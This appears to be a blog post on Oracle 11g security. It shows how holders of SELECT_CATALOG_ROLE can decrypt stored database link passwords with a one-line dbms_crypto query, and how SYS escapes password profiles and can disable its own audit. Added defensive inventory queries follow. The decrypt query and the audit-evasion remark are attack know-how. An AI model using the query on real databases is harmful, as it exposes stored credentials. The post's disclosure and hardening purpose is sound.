Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select db link passwords.
The truth is that any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;


If the user lacks EXECUTE on dbms_crypto, the ciphertext may need to be copied over to another DB under the control of the attacker.

Selecting from ku$_dblink_view via SELECT_CATALOG_ROLE is fixed in and above, as is the “stealth password cracking vulnerability”, which has gained a lot of attention and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack?
The only account that is guaranteed to be present and unlocked is SYS.
For both the stealth brute force and my orabrute style brute force, the primary defence is the strength of the SYS password.
If the SYS password is a 15 character passphrase that is changed regularly, then the attacks are ineffective. So how do we ensure the SYS password is complex and the account is secure?
The problem is that SYS is immune to profiles in 11g, so there is no password history, no account locking, no failed logon delay and, crucially, no password complexity function.
The SYS password could be ‘a’ and no-one else would be the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is ‘a’ if they are coming in through Unix with “/ as sysdba”.
SYS can even silently turn off its own audit through oradebug, so there is no record of the attack either.
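The following queries are an added defensive check, not part of the original post and not the author's code. Run as a DBA, they cover the two exposures described above: who can reach the db link ciphertext through SELECT_CATALOG_ROLE (directly or via a role chain such as DBA), which links actually carry stored credentials, which profile SYS and SYSTEM sit in and what password verify function that profile names, and whether SYS auditing is switched on at all. Only standard 11g data dictionary views and parameters are used; the role-hierarchy walk relies on ROLE_ROLE_PRIVS, which only shows roles the querying user has access to, so it is assumed to be run as SYS or an equivalent DBA account.

```sql
-- Added example (not from the original post): defensive inventory for the
-- SELECT_CATALOG_ROLE / ku$_dblink_view exposure and SYS password posture.
-- Assumes standard 11g dictionary views; run as SYS or a DBA-equivalent user.

-- 1. Every role that includes SELECT_CATALOG_ROLE, directly or transitively
--    (e.g. DBA, EXP_FULL_DATABASE), plus the role itself.
WITH scr_roles AS (
    SELECT 'SELECT_CATALOG_ROLE' AS role FROM dual
    UNION
    SELECT role
      FROM role_role_privs
     START WITH granted_role = 'SELECT_CATALOG_ROLE'
    CONNECT BY PRIOR role = granted_role
)
-- 2. Users holding any of those roles: these accounts can read the stored
--    db link ciphertext regardless of whether they are SYS.
SELECT DISTINCT drp.grantee,
       drp.granted_role,
       drp.admin_option,
       drp.default_role
  FROM dba_role_privs drp
  JOIN scr_roles      r ON r.role = drp.granted_role
  JOIN dba_users      u ON u.username = drp.grantee   -- users only, not roles
 ORDER BY drp.grantee, drp.granted_role;

-- 3. Links with stored credentials: a non-null USERNAME means an encrypted
--    password is held in the dictionary and is what the decrypt above exposes.
SELECT owner, db_link, username, host, created
  FROM dba_db_links
 WHERE username IS NOT NULL
 ORDER BY owner, db_link;

-- 4. Which profile SYS and SYSTEM are assigned and which verify function it
--    names. The post's point is that the limit is enforced for SYSTEM but not
--    for SYS in 11g, so a non-NULL function here is not evidence SYS is covered.
SELECT u.username,
       u.profile,
       p.limit AS password_verify_function,
       u.account_status
  FROM dba_users    u
  JOIN dba_profiles p ON p.profile = u.profile
 WHERE u.username IN ('SYS', 'SYSTEM')
   AND p.resource_name = 'PASSWORD_VERIFY_FUNCTION'
 ORDER BY u.username;

-- 5. Whether actions taken AS SYSDBA are being written to the OS audit trail.
--    If audit_sys_operations is FALSE, the "no record of the attack" scenario
--    in the post holds before anyone touches oradebug.
SELECT name, value
  FROM v$parameter
 WHERE name IN ('audit_sys_operations', 'audit_trail', 'audit_file_dest')
 ORDER BY name;
```

Anything returned by queries 1 and 2 beyond the expected DBA accounts is worth explaining, since each such grantee can read the same ciphertext the post shows SYS decrypting. Query 4 is a reminder that profile output for SYS is informational only in 11g; the strength of the SYS password still has to be enforced procedurally, as the post argues.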

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.

